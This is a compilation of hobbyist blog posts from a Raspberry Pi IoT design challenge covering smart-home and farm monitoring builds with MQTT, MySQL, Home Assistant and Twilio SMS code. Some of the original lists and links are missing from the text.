        sampleSubscriber = new SampleAsyncCallBack(url, clientId, cleanSession,
                quietMode, userName, password);
        sampleSubscriber.subscribe(subTopic, qos);
    } catch (Throwable me) {
        // Display full details of any exception that occurs
        System.out.println("reason " + ((MqttException) me).getReasonCode());
        System.out.println("msg " + me.getMessage());
        System.out.println("loc " + me.getLocalizedMessage());
        System.out.println("cause " + me.getCause());
        System.out.println("excep " + me);
        me.printStackTrace();
    }
}

In order to create the subscriber, I instantiate the class SampleAsyncCallback (implementing MqttCallback). The subscription is performed as a combination of the subscribe() method (which starts and manages the process) and waitForStateChange(). As a result, the code will navigate through all the connection steps: While the client is subscribed, the information will get to the phone as a callback, messageArrived().
This method is used to: More details of this callback:

/**
 * @see MqttCallback#messageArrived(String, MqttMessage)
 */
public void messageArrived(String topic, MqttMessage message) throws MqttException {
    // Called when a message arrives from the server that matches any
    // subscription made by the client
    String time = new Timestamp(System.currentTimeMillis()).toString();
    System.out.println("Time:\t" + time + " Topic:\t" + topic
            + " Message:\t" + new String(message.getPayload())
            + " QoS:\t" + message.getQos());

    if (topic.equals("sensors/door")) {
        //Change door values
        //MainActivity.doorState.setText(new String(message.getPayload()));
        SmartHomeActivity.readDoor = new String(message.getPayload());
        receivedDoor = true;
    } else if (topic.equals("sensors/temperature")) {
        //Change temperature values
        //MainActivity.tempState.setText(new String(message.getPayload()));
        SmartHomeActivity.readTemp = new String(message.getPayload());
        receivedTemp = true;
    } else if (topic.equals("sensors/pressure")) {
        //Change pressure values
        //MainActivity.pressState.setText(new String(message.getPayload()));
        SmartHomeActivity.readPress = new String(message.getPayload());
        receivedPres = true;
    } else if (topic.equals("sensors/warning")) {
        //Change warning
        //MainActivity.warningState.setText(new String(message.getPayload()));
        SmartHomeActivity.readWarning = new String(message.getPayload());
        receivedWar = true;
    } else if (topic.equals("sensors/altitude")) {
        SmartHomeActivity.readAlt = new String(message.getPayload());
    } else {
        //Change anything
        SmartHomeActivity.readTemp = ("?");
        SmartHomeActivity.readWarning = ("?");
        SmartHomeActivity.readDoor = ("?");
        SmartHomeActivity.readPress = ("?");
    }

    if (receivedDoor && receivedTemp && receivedPres) {
        receivedDoor = false;
        receivedTemp = false;
        receivedPres = false;
        receivedWar = false;
        //Go to the next step of the connection
        SmartHomeActivity.subscribed = false;
    }
}

At this point, I use the subscribe() function when pressing the SUBSCRIBE button.
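The essence of that callback is a topic-to-field dispatch plus a "have we got everything?" check. A hedged Python sketch of the same logic; the SensorState class is my own stand-in for the Android activity's fields, while the topic names come from the post:

```python
# Topic dispatch sketch mirroring messageArrived(): store each payload by
# topic, and signal once the three required sensor readings have arrived.
class SensorState:
    def __init__(self):
        self.values = {}
        self.received = set()

    def on_message(self, topic, payload):
        known = {"sensors/door", "sensors/temperature",
                 "sensors/pressure", "sensors/warning", "sensors/altitude"}
        if topic in known:
            self.values[topic] = payload
            self.received.add(topic)
        # A full refresh needs at least door, temperature and pressure.
        required = {"sensors/door", "sensors/temperature", "sensors/pressure"}
        if required <= self.received:
            self.received.clear()
            return True  # trigger the next step of the connection
        return False

state = SensorState()
state.on_message("sensors/door", "open")
state.on_message("sensors/temperature", "21.5")
done = state.on_message("sensors/pressure", "1013")
```

After the third required topic arrives, done is True and the received set is reset, just as the Java code clears its receivedDoor/receivedTemp/receivedPres flags.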
I have been using it mainly for debugging purposes: I can check whether messages are received by the broker when the sensor data seems to be lagging. NOTE: Client ids! Throughout this project, I have been creating a few different clients. It might be obvious, but sometimes it is not... I have been giving them different ids. The broker will refuse any connection if there is already a client with that name. I wanted to refine this Smart Home activity, since it's missing both a nicer look and additional useful commands. Regarding these commands, I want to point out that: All in all... it will get the job done, but it is still not the most comfortable to deal with. This post closes the implementation of our User's Node. Now, we have the two main functions of the system: In order to have a bit more feedback and add some thrill while running ("wait! when did he run all those miles?? no way I will let this be"), I want to have an updated table of the current month's competition state. That means: Existing file: insert_into_table.php. New functionality: obtain the last row of each table. So, apart from inserting information into the database, the competition service should be able to: The main .php file is now able to read different types of messages. As a result, we differentiate: This request, the get_row, also contains the names of all the roommates, which will be used to select the individual tables. Then, the file will: 1. Once we obtain the value from the right HTTP_POST ($json), extract the roommates requested. Each roommate = table. 2. Fetch the last row of each user's table. 3. Extract the monthly distance:

//Decode JSON into an array
$data = json_decode($json);
foreach($data as $key=>$val){
    $row_last = $db->read_rows($val);
    $month = $row_last[NUM_MONTH_COLUMN];
}

(*) The read_rows function has been developed to contain the corresponding SQL calls to obtain the last row and fetch it as an array to return. 4.
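The get_row flow (one table per roommate, last row per table) can be sketched in Python with an in-memory SQLite database standing in for the MySQL Competitiondb. Table names, column names and the sample data are assumptions based on the post:

```python
# Sketch of the competition service's "last row per roommate table" query,
# using sqlite3 in place of MySQL for illustration.
import sqlite3

db = sqlite3.connect(":memory:")
for name in ("alice", "bob"):
    db.execute(f"CREATE TABLE {name} (ts INTEGER, monthly_distance REAL)")
db.executemany("INSERT INTO alice VALUES (?, ?)", [(1, 2.0), (2, 5.5)])
db.executemany("INSERT INTO bob VALUES (?, ?)", [(1, 1.0), (2, 3.2)])

def last_monthly_distance(table):
    # Ask the database for just the most recent row rather than
    # scanning the whole table on the client side.
    row = db.execute(
        f"SELECT monthly_distance FROM {table} ORDER BY ts DESC LIMIT 1"
    ).fetchone()
    return row[0]

result = {name: last_monthly_distance(name) for name in ("alice", "bob")}
```

Pushing the ORDER BY ... LIMIT 1 into the query keeps the transfer to one row per roommate, which matters once the distance tables grow over months of logging.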
At the end, send it back to the requester, the User's Node. Initial setup: Nexus 5 / Android / SmartCompetitionHome App v2. In this section, I explain how PodiumTableActivity.java is implemented. It will request the current state of the competition from the server and display it in a table. Again, results will be organized from top to bottom. This Activity will only display a table (and, later on, a REFRESH button). When the Activity is created, it will request the monthly information for each user from the Central Node. Once the response arrives, the table is updated with the most recent data. The interesting part of this file is the new AsyncHttpResponseHandler, which handles successful messages as follows:

//Handle successful response
public void onSuccess(String response) {
    System.out.println("Get comp Server response: " + response);
    try {
        //Convert to a JSON Array and get the arguments
        JSONArray arr = new JSONArray(response);
        //List<String> args = new ArrayList();
        //Analyze each JSON object
        JSONObject jsonObj = (JSONObject) arr.get(0);
        Iterator<?> keys = jsonObj.keys();
        while (keys.hasNext()) {
            String key = (String) keys.next();
            lastMonthValues.put(key, jsonObj.getString(key));
        }
        //Update GUI values:
        updateTableValues();
    } catch (JSONException e) {
        e.printStackTrace();
    }
}

(*) lastMonthValues is a Map<String, String> structure holding each roommate's monthly distance. In updateTableValues() we use this information to organize the podium table. NOTE: There should be a way of reducing that long delay when retrieving data. The competition Android application is completed! With this version, each user can: This post describes the last step to have a functional competition system. It will show how to update the Python GUI of the central node with the data stored in the database (coming from each of the roommates' phones, as explained in the previous post). It is a short entry describing: All development is done on the central node (Raspberry Pi 3), using Python and SQL queries.
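The parsing-plus-ordering step can be shown compactly in Python. The payload shape below is an assumption (a one-element JSON array holding an object that maps roommate name to monthly distance, matching the Java code's arr.get(0)):

```python
# Parse the server's JSON response and order the podium best-first,
# as updateTableValues() does in the Android activity.
import json

response = '[{"alice": "5.5", "bob": "3.2", "carol": "7.1"}]'
last_month_values = json.loads(response)[0]

# Organize results from top to bottom, largest distance first.
podium = sorted(last_month_values.items(),
                key=lambda kv: float(kv[1]), reverse=True)
```

Note the float() conversion: the values arrive as strings, so sorting them lexically would rank "10.0" below "9.0".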
It will be hosting two kinds of tables: Most of the information will be stored by the Competition service, as explained in [Pi IoT] Smart Competition Home #8: Competition system III - Android Competition application: communicating with the server (each roommate's distance information). Then, the Python main program will retrieve that information and display the competition in its main GUI. It will also determine who is the monthly winner at the end of each period. Nevertheless, the main Python activity will be the one handling the winners table. Once we change to a new month, it will use the last monthly_distance value of each resident to select and store that past month's winner. Both the Competition service and the main program access the database with a specific user and password. Since it is not very advisable to always use root, I will show how to: Let's begin... On a command prompt of the central node, we start the mysql service as the root user. As a step 0, create the database to use:

> CREATE DATABASE Competitiondb;

And start using it (~open):

> USE Competitiondb;

To create a new local user, we input the following SQL command:

> CREATE USER 'userName'@'localhost' IDENTIFIED BY 'password';

To grant permissions (in my case SELECT, DELETE, CREATE, DROP {table}, INSERT, UPDATE {into table}):

> GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP ON Competitiondb.* TO 'userName'@'localhost';

To test this user, I will create a new mock table and then erase it.
We will see the number of tables with the SHOW TABLES command (none at this point). Here is the screenshot: We keep the 'userName' and 'password' information to be used in any code accessing the database. Initial setup: Raspberry Pi 3 - Raspbian OS (Jessie) / SSH enabled / Mosquitto MQTT broker installed / MQTT subscriber client / Console interface / Python GTK interface / MySQL server / Apache2 web server / Competition service version 1. The GUI is already prepared to host the current competition table (showing each resident's progress, with the best on top). More details on how it was done can be found in [PiIoT] Smart Competition Home #5: Central Node Upgrade. (*) last version of the Central Node code. New file - read_db.py. Existing file - main_gui.py. read_db.py has only one function, read_last_sample(table), performing two main actions:

import MySQLdb

def read_last_sample(table_name):
    db = MySQLdb.connect(host="this_host",       # your host, usually localhost
                         user="userName",        # your username
                         passwd="one_password",  # your password
                         db="Competitiondb")     # name of the database
    # Cursor to db
    cur = db.cursor()
    # Select table
    cur.execute("SELECT * FROM " + str(table_name))
    # Return the last row. MySQLdb cursors have no fetchlast() method,
    # so fetch everything and keep the final row.
    all_rows = cur.fetchall()
    last_row = all_rows[-1]
    db.close()
    return last_row

The main_gui.py will call the function read_last_sample(table) every time a GUI label is updated. It will refresh the last values for each of the roommates. New file - write_db.py. Existing file - main_gui.py. In this case, the main_gui will detect when a new month starts and select the best resident during the previous one. The result will be stored in the winners table, using the file write_db.py (very similar to read_db.py, though it executes an INSERT query). (What a coincidence... I am winning.) For the first time, I can say we have a "Smart Competition House" (yet a very basic one).
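The month-rollover logic described above (detect a new month, then store the previous month's winner) is easy to get subtly wrong around year boundaries. A hedged sketch; the data shapes and function names are my own for illustration:

```python
# Month-rollover sketch: compare (year, month) pairs rather than month
# numbers alone, so December -> January is also detected as a new month.
import datetime

def detect_new_month(previous, now):
    return (now.year, now.month) != (previous.year, previous.month)

def pick_winner(last_distances):
    # last_distances maps resident -> monthly distance at month's end
    return max(last_distances, key=last_distances.get)

prev = datetime.date(2016, 7, 31)
today = datetime.date(2016, 8, 1)
winner = None
if detect_new_month(prev, today):
    winner = pick_winner({"alice": 5.5, "bob": 3.2})
```

Comparing the (year, month) tuple is the design choice worth keeping: a bare month comparison would miss the December-to-January transition.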
In the house central node, there will be displayed: The platform is lacking a lot of interactivity though (we cannot see the competition state on the phone, and there is no current interface for the smart house either). Going through my previous blog entries I realized I had not provided the follow-up information for my Farm Operations Center box that I had previously said I would. So here it is! :-) As I had mentioned before, the medium-sized box worked perfectly as a container for the 7-inch touchscreen with Pi3 attached. As you can see here, the 4 squares line up perfectly with the metal frame of the touchscreen, making for an easy mounting of the F.O.C. to the plastic container. Here we have the view of Camera 2, moved over to monitor the Duck Domain. With an easy swipe of a finger up or down I can look at any of the camera feeds! From my top picture above you can see there is a good amount of space available to mount additional items, including but not limited to batteries. I had come across a very interesting-sounding battery option with pass-through capabilities advertised at Best Buy that I wanted to try. Of course, when I arrived there to purchase it there were none to be found. Online it listed 3 in inventory; even the store's internal inventory listed 1, but after an hour of waiting and searching through Best Buy I ended up heading over to Walmart again to pick up a small USB battery. Sadly, the idea of pass-through charging only seems of interest to those with cell phones. Trying to explain to various techs what exactly I needed in a battery led to a lot of confused looks and nothing that helped me for this project. You would think the idea of having a power source that can charge your phone/tablet/micro-USB item while also charging itself would be a great thing to have. Why bring a charger and a battery if your battery can also charge your device while charging itself? Obviously a pass-through battery would be quite nice to add into the F.O.C.
box so I could just quickly pull the cord and head out to check things without having to power down and restart on the battery. I did end up picking up a basic 4400 mAh battery with the idea of testing it, but while I was assured it had a 2.1 A output, the RPi3 with the 7-inch screen was not impressed with the power it actually provided and refused to work with just that battery. So a caveat to others: keep your receipts and packaging. Once I do find a pass-through battery that works for my setup I will share it with Element 14. There seems to be some irony in the fact that my blog #13 comes with bad news. I was unable to get my EnOcean Pi to work with 3 different Raspberry Pis, leading me to wonder if I have a bad HAT. :-( I worked for days on getting it to link with the Raspberry Pi 3 that is running my Farm Operations Center, but it would never show as recognized. Looking at other comments, there seems to be a problem with the Raspberry Pi 3 and this currently, so I pulled out 2 different Raspberry Pi 2s to see if that would help. Regardless of the Pi platform, the EnOcean Pi could not be seen. There are some very interesting writeups on installing the EnOcean Pi and they were quite helpful in trying to troubleshoot what was happening, but no success. My desire to use the sensors is still very high and I am considering ordering another EnOcean Pi and another set of sensors, since once it works I can see adding more inputs easily. The reed sensor is what I want to tie into my sliding fowl doors, to alert me when one is open. Energy harvesting and radio communications: a huge plus! I had ordered a float sensor and was looking forward to seeing if I could tie it into the temperature card, since the data on it showed inputs that might be of use. Of course, having the current temperature around animals is always a plus. The float sensor is to be installed into this watering system. The bottom bowl has a float-controlled water input.
The 5-gallon bucket would be where the float sensor would reside, to alert when the water was low. As you can see below the bucket, I have planned ahead by putting in a T. The capped part of the T will be routed over to my rabbit cages to allow each rabbit to have its own individual water source via the chicken nipples I have previously shown. The blue bowl will be for my G.O.A.Ts. Depending on how quickly the water is gone through, I may tie in another 5-gallon bucket as well. But that requires future monitoring. Here is the one complete rabbit cage. You can see the individual PVC feeder tubes I have in place. I want to do something similar for the water, but have them all tied into the bucket system shown above. On the left-hand side you can see the baby box with Momma Rabbit perched on top of it. I am sad that this part of my plans did not work through, and I look forward to seeing if I can get another EnOcean Pi to fully implement the whole plan of the IoT Farm! First off, I want to thank Element 14 and all of the incredible participants of this design challenge! It was an experience I greatly enjoyed and want to continue to expand upon! The other participants had brilliant ideas and implementations and constantly made me wonder how I could further tweak and improve my own project. Plus, input from several actually helped me redirect some of my efforts over to a water source monitoring system. I am very pleased with how the Farm Eyes and the Farm Operations Center worked together to allow me to monitor my current areas of observation. I definitely look forward to implementing the sensors part of the project and hope that a new HAT will allow that to work. I will of course blog about this to share with Element 14! My family and I thank Element 14 for giving me the chance to work my ideas into reality. Please keep watching to see how it improves, and feel free to make suggestions based on your experiences or thoughts!
[Pi IoT] Thuis #9: Status Update will give you the latest status of all the projects and use cases. These are the projects I made available as open source on my GitHub account during this challenge (or will make available later). They are all set up so that they can be reused by others in their own home automation projects. As described in [Pi IoT] Thuis #7 and [Pi IoT] Thuis #5: Cooking up the nodes – Thuis Cookbook, you can also find something new for yourself. In [Pi IoT] Thuis #14: Home Theater part 1: CEC I made some small updates as I installed the node connected to the home theatre system by HDMI. Plex doesn't allow me to add a plugin directly in the server, but there is an API and WebSockets for status messages. The API and WebSockets are implemented, as is described in [Pi IoT] Thuis #16: Home Theater part 3: Plex. It is mostly implemented as a Java library, with a similar setup as I'm using for integrating Java and MQTT. As I have to clean up the project, it will be published at a later stage. To-do: [Pi IoT] Thuis #14: Home Theater part 1: CEC. In [Pi IoT] Thuis #10: [Pi IoT] Thuis #16: Home Theater part 3: Plex. To-do: Sensors are placed in both the kitchen and the entrance room. The Core knows about them, and as described in [Pi IoT] Thuis #8: Core v2: A Java EE application, rules are defined to turn the lights in those rooms on and off depending on movement and time. This works pretty well already! To-do: The iBeacons are placed at several locations in the house, providing good coverage to detect when you're arriving home. When you arrive home a notification is sent, which allows you to directly start up the home theatre system. You can read about this in [Pi IoT] Thuis #13: Presence monitoring using iBeacons. [Pi IoT] Thuis #15: Home Theater part 2: controls. The Ambilight will be finished at a later stage.
To-do: The app is running and fully functional, as you can see in [Pi IoT] Thuis #11. Most lights can already be switched manually using the buttons on the walls. Some of them should however be switched using the secondary button, which does a scene activation. I still have to add support for this to Zway-MQTT. To-do: For energy monitoring I only did some research. InfluxDB seems to be a good candidate for storing the data. Unfortunately I wasn't able to work on this use case during the challenge, but I'll come back to it at a later stage. To-do: I already mentioned some future plans; a few of those I want to highlight. I enjoyed reading the blogs of the other challengers as well; great to see so many great ideas! Thanks again to element14 for selecting me as a sponsored challenger and for giving me the inspiration and motivation to work on Thuis! A lot of online sources were used in order to achieve the creation of my project. Though the sources have been linked in the relevant posts, I have summarised the complete list per subject right here for your convenience. It's been a tough, stressful, but certainly fun three months competing in this challenge. As if the challenge itself wasn't challenging enough, I also moved house halfway through the challenge. Though the move was more time-consuming than originally anticipated, I managed to complete most of the objectives I had set originally. This is my final post for element14's Pi IoT Design Challenge, summarising and demonstrating my project builds. The following features were implemented, making several rooms smarter: Unfortunately I couldn't crack the code of my domotics installation yet, but help seems to be on the way. To accommodate all of the above-mentioned features, five different devices were created: The energy monitoring device makes use of an open source add-on board for the Raspberry Pi, called emonPi.
Using clamps, it is able to measure the current passing through a conductor and convert it into power consumption. I combined the emonPi with a Raspberry Pi Zero and two current clamps: one to measure the power consumption of the shed, the other for the lab. This can of course be applied to any room, as long as the clamp is attached to the proper conductor. Want to know more about emonPi? Two IP cameras were installed for live monitoring: one in the lab, and one in the shed. Both make use of the Raspberry Pi Zero v1.3 with camera port. The video stream is converted to MJPEG and embedded in OpenHAB in the matching view. A mini build which was not originally foreseen, but which I thought would fit nicely in this challenge. The concept is simple: four connectors are foreseen to which keys can be attached. When a key is attached, a GPIO pin changes status, reporting the change to the control unit. A future improvement could be to either use a different connector per key, or make use of different resistors and an ADC to know which key is inserted where. The full project is described in a dedicated blog post: The idea of the smart, voice-controlled alarm clock started in 2014. The result was a functional prototype, but too slow and bulky to be really useful. This challenge was the perfect opportunity to revisit this project, and I'm quite happy with the way it turned out! Here's a side-by-side comparison: The original Raspberry Pi 1 B with Wolfson audio card has been replaced by the new Raspberry Pi 3 B with USB microphone and I2S audio module. The difference in performance is incredible. The result is a near real-time, voice-controlled device capable of verifying sensor status, fetching internet data such as weather information, or even playing music. Most of the work was done for this device, and simply reused by the others.
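The current-to-power conversion that a clamp setup like the emonPi performs boils down to multiplying the measured RMS current by the mains voltage. A hedged sketch; the 230 V figure is an assumed nominal mains voltage, and real installations calibrate against a known load:

```python
# Sketch: turning a current-clamp RMS reading into a power figure.
MAINS_VOLTAGE = 230.0  # assumed nominal mains voltage (volts)

def apparent_power(current_rms_amps, voltage_rms=MAINS_VOLTAGE):
    # Apparent power in volt-amperes; for a purely resistive load this
    # equals real power in watts. Reactive loads need a power factor too.
    return voltage_rms * current_rms_amps

shed = apparent_power(1.5)  # clamp on the shed feed reads 1.5 A RMS
lab = apparent_power(4.2)   # clamp on the lab feed reads 4.2 A RMS
```

For 1.5 A this gives 345 VA for the shed; the emonPi itself samples both voltage and current waveforms when possible, which is more accurate than assuming a fixed voltage as done here.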
The posts cover voice control, setting up OpenHAB, controlling displays, and much more: The Control Unit has the same guts as the alarm clock: I2S audio, USB microphone, speaker, Raspberry Pi 3, etc ... It does however add a keypad and touch screen, allowing control via touch on top of voice. The keypad switches between different webpages on the touch screen, which is locked in kiosk mode. The touch screen can be used to trigger actions, visualise historic data (power consumption, temperature), consult the weather, etc ... You can find the relevant posts below: Various demonstrations were already made over the course of the challenge. But as this is a summary post, I've created a video showcasing the entirety of the project. Hope you like it! Because this project wouldn't have been possible without the plethora of online content and tutorials allowing me to combine and modify functionality to give it my own twist, I am publishing all the code created as part of this challenge in a dedicated GitHub repository. You can find it here: The repository contains the Python scripts, Puppet modules and diagrams, all categorised in a way I thought would make sense. I will make sure the repository is updated as soon as possible! I'd like to thank element14, Duratool, EnOcean and Raspberry Pi Foundation for organising and sponsoring another great challenge. It's been a wild ride, thank you! I would also like to thank element14Dave, fellow challengers and members for their input and feedback over the course of the challenge. Finally, a big thank you to my wife and kids for allowing me to participate and even help me do the demonstrations! Time for some rest now, and who knows, perhaps we'll meet again in a future challenge. Here is quick project summary of the Pi3 Control Hub project created for the Pi IoT Design Challenge - Smarter Spaces with Raspberry Pi 3. 
The idea here was to create a Hub and spoke network of Raspberry Pi's with the Pi 3 as the Hub , which had Home- Assistant installed on it, which is a powerful open- source home automation platform. And a few other versions of the Pi used as the spokes , that is Here is a video demo, of some of the features implemented as part of the project As part of the Hub , here are few features I plan on use on a day to day basis - Controlling the Hue Light bulbs using the Home-Assistant - Check weather conditions on the Sense Hat before leaving for work in Morning - Use the Pi Camera connected to the Hub to Monitor stuff , like a print job running on my 3D printer, by opening Home-Assistant on a tablet - Checking the outside temperature and comparing it to the temperature from the Yahoo weather API, this will be handy in the winter. - Checking on the picture gallery of the intruder detected, basically checking if I was able to catch some raccoons in action. - Checking if my Aunt/Mother visited me when i was away,given that they both have a spare key. Here the EnOcean magnetic contact switch connected to door will log an entry in Home-Assistant History, which I can come an check on in the evening. Here are the links to the various blogs, with a brief description Spoke 1 - Security Camera (in the image above you see the EnOcean temperature sensor attached which is used send the outside temperature to the Hub aka home assistant on Pi 3 via MQTT) As part of this spoke a Raspberry Pi Zero with a camera connector was used with a Pi Noir camera V2 was used and we setup motion for intruder detection. 
Pi Control Hub: Spoke 1: Security Camera - setting up Motion to stream video. Using the Single File PHP Gallery, we create a gallery of pictures that you can access from the Pi Zero via a web browser on your laptop: Pi Control Hub: Spoke 1: Security Camera (continued) - Photo gallery of the intruders. And we also designed and 3D printed STL files for an enclosure, which kind of looks like a security camera; you can find the STL files at Pi Control Hub: Spoke 1: Security Camera - STL files to 3D print. Spoke 2 - Blinds Automation. This was the most interesting and challenging spoke that was put together, considering this was the first time I was using the EnOcean sensor kit and module, which meant I ran some basic tests using FHEM and tried blinking a few LEDs when the EnOcean push button was pressed + the temperature module detected temperature + the magnetic contact was opened/closed, all of which were connected to a Raspberry Pi B+ via the EnOcean module. Pi Control Hub: Spoke 2: Blinds Automation - Setting up EnOcean Sensor and Blinking LEDs. To open and close the blinds, the plan was to use a gear motor driven by the Sparkfun motor driver when an EnOcean push button was clicked: Pi Control Hub: Spoke 2: Blinds Automation (continued) - Driving Motor with EnOcean PushButton. Lastly, we 3D printed an enclosure for the Pi B+ and EnOcean module and a mount for the gear motor; the STL files can be found at Pi Control Hub: Spoke 2: Blinds Automation (continued) - 3D Printing Holder and Motor mount. Blinds Automation using Raspberry Pi and EnOcean Sensor Kit. Spoke 3 - Key-Less Door Entry. As part of this spoke, a Pi A+ was used with a servo motor. In addition, a Python Flask application was written and hosted on the Pi A+, connected to my home WiFi. This app will be used to unlock the back door using a secret password which was set up in the code.
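Before driving the servo, such a key-less entry service needs to check the submitted password against the secret in the code. A hedged sketch of that check; the password value and function name are my own inventions, since the post only says a secret password is set up in the code:

```python
# Password check sketch for a key-less door service. Using
# hmac.compare_digest avoids leaking information through comparison timing.
import hmac

SECRET = "open-sesame"  # assumed value; the post keeps its secret in code

def should_unlock(submitted):
    # Constant-time comparison of the submitted password to the secret.
    return hmac.compare_digest(submitted, SECRET)
```

In the real spoke this check would sit inside the Flask route handler, and only a True result would trigger the servo that turns the door knob.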
Pi Control Hub: Spoke 3: Key-less Door entry - testing the Servo. The challenge with this spoke was designing the files to 3D print for the door knob and the servo mount; if you plan to replicate this, you can find the STL files at Pi Control Hub: Spoke 3: Keyless Door entry STLs. Key-less Door Entry using the Raspberry Pi. HUB. For the Hub, as mentioned above, Home-Assistant was installed on the Raspberry Pi 3, and as part of the first blog we set up a lot of sensors, including:
- Weather from the Yahoo API
- Bandwidth speed test
- Monitoring your favorite Twitch channels
- Getting today's value of Bitcoin
- Getting the Pi 3 CPU usage and disk space usage
In addition, we set up the Philips Hue bridge and an automation rule to switch on the light when you are at home, using your phone's Bluetooth: Pi Control Hub: Setting up Home Assistant + Controlling Philips Hue. Home Assistant setup on Raspberry Pi 3 - testing Philips Hue bulbs. Now, no home automation project is complete without music, which meant setting up Mopidy with a couple of speakers and Adafruit's Stereo 3.7W Class D Audio Amplifier; for the circuit and commands check out Pi Control Hub: Music with Mopidy and Home Assistant. Mopidy setup with Home Assistant on a Raspberry Pi 3. The next blog shows how to set up the Pi Camera V2 in Home Assistant to stream video, and also integrate the feed from the security camera spoke: Pi Control Hub: Integrating Cameras in Home Assistant. To build the case that holds all the electronic components, a mix of 3D printing and basic woodworking with a Dremel was used, and we also installed Chromium on Raspbian Jessie. As part of the final blog, we integrated the EnOcean temperature sensor and the magnetic contact sensor, which mimics the door opening and closing in Home-Assistant, by installing the Mosquitto MQTT broker on the Pi 3 and an MQTT client on the Pi B+ which is connected to the EnOcean module.
Pi Control Hub: Getting EnOcean Sensor data to Hub via MQTT.
[Pi IoT] Plant Health Camera #1 - Application
[Pi IoT] Plant Health Camera #2 - Unboxing
[Pi IoT] Plant Health Camera #3 - First steps
[Pi IoT] Plant Health Camera #4 - Putting the parts together
[Pi IoT] Plant Health Camera #5 - OpenCV
[Pi IoT] Plant Health Camera #6 - Putting the slave Pi to work
[Pi IoT] Plant Health Camera #7 - Synchronizing the cameras
[Pi IoT] Plant Health Camera #8 - Aligning the images
[Pi IoT] Plant Health Camera #9 - Calculating BNDVI and GNDVI
[Pi IoT] Plant Health Camera #10 - Connecting the Master and Slave Pi
[Pi IoT] Plant Health Camera #11 - Finalization
Also a nice intermediate summary made by Charles Gantt: Design Challenge Project Summary #23: Plant Health Camera **Final Update** I hope you all enjoyed the project; I'm open to any questions and comments. Best regards, Gerrit. It's been a fun project and I hope that you were able to glean some useful tidbits to use in your own projects. Here are a couple of pictures of the HangarControl master hub and the first of many remote heater controls. Now that the web interface is up and running (), it is time to add the final piece: operating the hangars via text messaging! I'm going to use Twilio () to provide a link between the SMS (text messaging) world and the web-based internet world. Twilio provides a plethora of tutorials and help, as well as a free phone number for your development projects. Once you have signed up and have your phone number and API credentials, come on back and follow along. It seems that everyone has a sample application that shows how easily their product works, but when you try integrating it into your own project, it all falls apart. I am going to show you how HangarControl implemented text messaging so you can see Twilio in a larger context. I have attached the application so that you can download and view it in its entirety.
# Use Flask for our "web" interface.
In this case "web" is going to return XML rather than HTML.

import flask
# Twilio provides libraries for most of the popular languages.
from twilio import twiml

app = flask.Flask(__name__)

I'm using my Twilio credentials as set in environment variables so that they don't get published! Either in your login script (most likely .bashrc) or possibly your FastCGI init script, set a couple of environment variables that your programs will read upon execution. This allows you to share code such as this without giving away your private information. If you're never going to show anyone else, then you can just replace the following with variable assignments like: app.config['account_sid'] = "your SID goes here"

import os
app.config['account_sid'] = os.getenv('ACCOUNT_SID', '<SID provided by Twilio>')
app.config['auth_token'] = os.getenv('AUTH_TOKEN', '<Secret auth token provided by Twilio>')

# We only have a single endpoint and will parse the string sent by Twilio to determine user intent
@app.route('/', methods=['GET', 'POST'])
def incoming_sms():
    attr = None
    message = flask.request.values.get('Body', '"?"')
    message = message[1:len(message) - 1]
    ary = message.split(" ")
    cmd = ary[0]
    if len(ary) > 1:
        attr = ary[1]
    if cmd in ["heat", "preheat"]:
        rtn = preheat(attr)
    elif cmd in ["cancel", "off"]:
        rtn = stop(attr)
    elif cmd in ["list", "status"]:
        rtn = status(attr)
    else:
        rtn = "Ask one of 'heat <hangar>', 'stop <hangar>', 'status', '?'"
    r = twiml.Response()
    r.message('HangarControl "{1}" {2}\n{0}'.format(rtn, message, cmd == u"preheat"))
    return flask.Response(str(r), mimetype='text/xml')

Once we have pulled apart the command and any parameters from the Twilio SMS message, the program will be dispatched to one of the following methods. I intentionally used these barebones methods to demonstrate what you would need for your own project. I will follow up with actual code, but didn't want to overly complicate this presentation.
Each method performs the requested action and then returns a string that will be packaged up and returned via text message to the pilot.

def preheat(hangar=None):
    return "Preheating {0}".format(hangar)

def stop(hangar=None):
    return "Turn off heater in hangar {0}".format(hangar)

def status(attr=None):
    return "Status {0}".format(attr)

Believe it or not, that's all you need to do to implement text messages in your applications. I'd heartily recommend adding SMS capabilities to your next project! Best of luck, Rick

As part of this blog post we are going to get the values of the EnOcean temperature sensor and the magnetic contact switch (which is attached to the door to check whether it is open or closed) into Home-Assistant, which is installed on the Hub. The EnOcean module is connected to the Raspberry Pi B+ that we used to automate the blinds (see the Pi Control Hub: Spoke 2: Blinds Automation blog post), which shows you how to install the FHEM home automation server and run the Python program that takes advantage of the FHEM server's telnet port to rotate a gear motor that opens and closes the blinds. To send the EnOcean temperature and magnetic contact values to the Hub via MQTT, we will have to install an MQTT broker on the Hub's Pi 3, for which we will use Mosquitto (an open source MQTT v3.1 broker), and install an MQTT client on the Pi B+ which is attached to the EnOcean module used for the blinds automation setup.
Here are the steps to follow.

#1 Install Mosquitto on the Hub's Pi 3. To use the new repository, first import the repository package signing key using the commands below:
wget
sudo apt-key add mosquitto-repo.gpg.key
Then make the repository available to apt:
cd /etc/apt/sources.list.d/
sudo wget
Now to install Mosquitto on the Raspberry Pi, run an update followed by an install:
sudo apt-get update
sudo apt-get install mosquitto

#2 To test the setup we will also install the Mosquitto clients:
sudo apt-get install mosquitto-clients

#3 Run a quick test locally on the Pi 3. Open two terminals; in one window subscribe to a topic using the command:
mosquitto_sub -d -t topic_test
And in the second terminal window, send a message to the topic:
mosquitto_pub -d -t topic_test -m "Hello Pi3"

#4 In Home-Assistant, add the following to the configuration.yaml file. To integrate MQTT into Home Assistant, add the following section:
mqtt:
  broker: 192.168.0.24
  port: 1883
  client_id: home-assistant-1
  keepalive: 60
  protocol: 3.1
where broker is the IP address of your Pi. For more info check out -
In addition, add the following to the configuration.yaml file as a door OPEN/CLOSE sensor:
binary_sensor:
  platform: mqtt
  state_topic: "home/door"
  name: "Door"
  qos: 0
  payload_on: "ON"
  payload_off: "OFF"
  sensor_class: opening
And to get the value of the EnOcean temperature sensor, add the following under the sensor section:
sensor:
  - platform: mqtt
    state_topic: "home/temperature"
    command_topic: "home/temperature"
    name: "EnOcean Temperature"
    qos: 0
    unit_of_measurement: "°C"

#5 On the Pi B+, install the MQTT client Paho. Paho makes communicating with an MQTT broker installed on the Pi 3 very simple and can easily be used in a Python program; we will install paho-mqtt using pip:
sudo apt-get install python-pip
sudo pip install paho-mqtt

